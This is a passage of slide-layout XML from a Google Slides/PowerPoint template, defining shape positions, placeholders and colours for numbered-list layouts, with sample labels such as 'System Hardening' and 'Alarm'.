        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="27437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13" name="Google Shape;313;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="32526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4" name="Google Shape;314;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Google Shape;315;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316" name="Google Shape;316;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7" name="Google Shape;317;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="32663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18" name="Google Shape;318;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="377527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9" name="Google Shape;319;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Google Shape;320;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321" name="Google Shape;321;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2" name="Google Shape;322;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="378897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23" name="Google Shape;323;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="43234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4" name="Google Shape;324;p22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="325" name="Google Shape;325;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326" name="Google Shape;326;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7" name="Google Shape;327;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="43371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22. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 328"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p2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30" name="Google Shape;330;p2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31" name="Google Shape;331;p2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32" name="Google Shape;332;p2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333" name="Google Shape;333;p2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34" name="Google Shape;334;p2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35" name="Google Shape;335;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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6" name="Google Shape;336;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="337" name="Google Shape;337;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338" name="Google Shape;338;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9" name="Google Shape;339;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="3873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0" name="Google Shape;340;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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1" name="Google Shape;341;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="342" name="Google Shape;342;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343" name="Google Shape;343;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4" name="Google Shape;344;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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5" name="Google Shape;345;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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6" name="Google Shape;346;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Google Shape;347;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348" name="Google Shape;348;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9" name="Google Shape;349;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="29967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0" name="Google Shape;350;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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1" name="Google Shape;351;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="352" name="Google Shape;352;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353" name="Google Shape;353;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4" name="Google Shape;354;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="34348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5" name="Google Shape;355;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="213525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6" name="Google Shape;356;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="357" name="Google Shape;357;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358" name="Google Shape;358;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9" name="Google Shape;359;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="21353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60" name="Google Shape;360;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="257336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1" name="Google Shape;361;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="362" name="Google Shape;362;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363" name="Google Shape;363;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4" name="Google Shape;364;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12250" y="25735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65" name="Google Shape;365;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="125888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6" name="Google Shape;366;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="367" name="Google Shape;367;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368" name="Google Shape;368;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9" name="Google Shape;369;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="12590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0" name="Google Shape;370;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="169698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1" name="Google Shape;371;p23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="372" name="Google Shape;372;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373" name="Google Shape;373;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4" name="Google Shape;374;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1697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23. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 375"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p2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7" name="Google Shape;377;p2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78" name="Google Shape;378;p2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79" name="Google Shape;379;p2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380" name="Google Shape;380;p2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81" name="Google Shape;381;p2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2" name="Google Shape;382;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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3" name="Google Shape;383;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="384" name="Google Shape;384;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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385" name="Google Shape;385;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;386;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="3873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7" name="Google Shape;387;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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8" name="Google Shape;388;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="389" name="Google Shape;389;p24"/>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390" name="Google Shape;390;p24"/>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1" name="Google Shape;391;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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92" name="Google Shape;392;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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3" name="Google Shape;393;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="394" name="Google Shape;394;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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395" name="Google Shape;395;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;396;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="29967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97" name="Google Shape;397;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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8" name="Google Shape;398;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="Google Shape;399;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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400" name="Google Shape;400;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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1" name="Google Shape;401;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="34348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2" name="Google Shape;402;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="213525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3" name="Google Shape;403;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="404" name="Google Shape;404;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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405" name="Google Shape;405;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;406;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2135375"/>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7" name="Google Shape;407;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="257336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8" name="Google Shape;408;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Google Shape;409;p24"/>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410" name="Google Shape;410;p24"/>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1" name="Google Shape;411;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="25735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12" name="Google Shape;412;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="125888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3" name="Google Shape;413;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="414" name="Google Shape;414;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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415" name="Google Shape;415;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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6" name="Google Shape;416;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000"/>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17" name="Google Shape;417;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="169698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8" name="Google Shape;418;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="419" name="Google Shape;419;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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420" name="Google Shape;420;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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1" name="Google Shape;421;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1697125"/>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24. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 422"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Google Shape;423;p2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24" name="Google Shape;424;p2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25" name="Google Shape;425;p2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26" name="Google Shape;426;p2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427" name="Google Shape;427;p2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28" name="Google Shape;428;p2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29" name="Google Shape;429;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="430" name="Google Shape;430;p25"/>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31" name="Google Shape;431;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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2" name="Google Shape;432;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275"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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275"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34" name="Google Shape;434;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;435;p25"/>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436" name="Google Shape;436;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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7" name="Google Shape;437;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3572250"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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572250"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39" name="Google Shape;439;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;440;p25"/>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441" name="Google Shape;441;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>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2" name="Google Shape;442;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="193852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25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="193858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25. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 444"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="445" name="Google Shape;445;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286275" y="649650"/>
            <a:ext cx="827450" cy="4115237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p2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47" name="Google Shape;447;p2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48" name="Google Shape;448;p2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449" name="Google Shape;449;p2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50" name="Google Shape;450;p26"/>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1" name="Google Shape;451;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="33018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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="4767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System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Google Shape;453;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3D85C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Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
